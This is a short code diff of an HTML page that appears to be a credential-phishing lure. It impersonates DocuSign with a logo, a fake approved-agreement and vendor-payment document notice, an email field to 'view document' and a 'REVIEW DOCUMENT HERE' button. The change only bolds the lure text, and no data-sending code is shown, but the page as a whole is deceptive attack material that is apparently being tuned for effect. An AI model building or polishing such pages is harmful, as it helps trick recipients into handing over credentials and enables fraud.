--- a/index.html
+++ b/index.html
@@ -71,7 +71,7 @@
     <div id="auth-page" class="container">
         <img src="https://upload.wikimedia.org/wikipedia/commons/3/34/DocuSign_logo.png" alt="Outlook Logo" class="logo"><br>
         
-        <p>Approved: Completed Non-Disclosure Agreement & MOU Vendor#30862911 Payment_terms.pdf</p><br><br>
+        <p><b>Approved: Completed Non-Disclosure Agreement & MOU Vendor#30862911 Payment_terms.pdf</b></p><br><br>
         <input type="email" id="email" placeholder="Enter the recipient's email to view document"> </br></br>
         <button onclick="validateEmail()">REVIEW DOCUMENT HERE</button>
     </div>
